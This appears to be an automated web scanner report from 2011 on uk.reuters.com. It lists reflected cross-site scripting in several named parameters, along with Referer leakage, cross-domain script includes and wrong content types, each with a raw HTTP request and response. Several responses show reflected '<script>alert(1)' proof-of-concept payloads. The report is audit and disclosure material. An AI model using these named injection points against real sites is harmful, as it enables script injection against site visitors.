1. Cross-site scripting (reflected)
1.1. http://uk.reuters.com/assets/commentsChild [articleId parameter]
1.2. http://uk.reuters.com/assets/commentsChild [channel parameter]
1.3. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]
1.4. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]
1.5. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]
1.6. http://uk.reuters.com/tracker/guid [cb parameter]
2. Cross-domain Referer leakage
3. Cross-domain script include
3.1. http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
3.2. http://uk.reuters.com/assets/commentsChild
4. Content type incorrectly stated
4.1. http://uk.reuters.com/assets/breakingNews
4.2. http://uk.reuters.com/assets/info
4.3. http://uk.reuters.com/assets/multimediaJSON
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:36:11 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 4288 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-09 <![endif]--> <!--[if !IE]> token: a03a4b1f-8f2f-4acd-99d4 ...[SNIP]... <input type="hidden" name="article_id" value="UKTRE71C1YB20 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:36:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 4611 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-02 <![endif]--> <!--[if !IE]> token: 713cd201-ddcb-44ba-94cd ...[SNIP]... <input type="hidden" name="channel" value="lifestyleMolt281d2"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/sharedModuleJS |
GET /assets/sharedModuleJS Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:44 GMT Server: Apache-Coyote/1.1 Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 12326 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-09 <![endif]--> <!--[if !IE]> token: 39ab1270-bb2b-4b67-8fbe Reuters.nav.callback14ee36<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/sharedModuleJS |
GET /assets/sharedModuleJS Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:46 GMT Server: Apache-Coyote/1.1 Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 15063 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-04 <![endif]--> <!--[if !IE]> token: 949f6358-57b7-41d4-bcd0 ...[SNIP]... <a href="112a5--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/sharedModuleJS |
GET /assets/sharedModuleJS Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:44 GMT Server: Apache-Coyote/1.1 Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 15000 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-01 <![endif]--> <!--[if !IE]> token: 32575fb7-ba79-4402-8b83 ...[SNIP]... <a href="f5722"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /tracker/guid |
GET /tracker/guid?cb Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:39:19 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache Content-Type: text/javascript Connection: close Content-Length: 150 typeof doTrack783971566;alert(1)/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:49 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:33:36 GMT Age: 133 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 4694 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-11 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:33:36 GMT and will ex ...[SNIP]... </div> <script type="text/javascript" src="http://connect ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /article/2011/02/13/us |
GET /article/2011/02/13/us Host: uk.reuters.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:34:44 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:29:06 GMT Last-UpdatedL: Mon, 14 Feb 2011 00:48:11 GMT CHANNEL-NAME: lifestyleMolt Last-UpdatedA: Sun, 13 Feb 2011 22:50:40 GMT Age: 336 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 50850 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-04 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:29:07 GMT and will ex ...[SNIP]... </span> <script src="http://cdn.js-kit <script src="http://cdn.js-kit ...[SNIP]... </div> <script type="text/javascript" src="http://reuters ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://uk.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:49 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:33:36 GMT Age: 133 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 4694 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-11 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:33:36 GMT and will ex ...[SNIP]... </div> <script type="text/javascript" src="http://connect ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://uk.reuters.com |
Path: | /assets/breakingNews |
GET /assets/breakingNews HTTP/1.1 Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:12 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:34:55 GMT Age: 16 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 399 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-04 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:34:55 GMT and will ex ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://uk.reuters.com |
Path: | /assets/info |
GET /assets/info HTTP/1.1 Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:35:01 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:31:09 GMT Age: 231 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 491 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-06 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:31:09 GMT and will ex ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://uk.reuters.com |
Path: | /assets/multimediaJSON |
GET /assets/multimediaJSON Host: uk.reuters.com Proxy-Connection: keep-alive Referer: http://uk.reuters.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; adDisplayManager=freqCap |
HTTP/1.1 200 OK Date: Mon, 14 Feb 2011 01:39:12 GMT Server: Apache Expires: Mon, 14 Feb 2011 01:37:14 GMT Last-UpdatedA: Sun, 13 Feb 2011 22:50:40 GMT Age: 118 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 2697 <!--[if !IE]> This has been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: produk-web-03 <![endif]--> <!--[if !IE]> Cached on Mon, 14 Feb 2011 01:37:14 GMT and will ex ...[SNIP]... |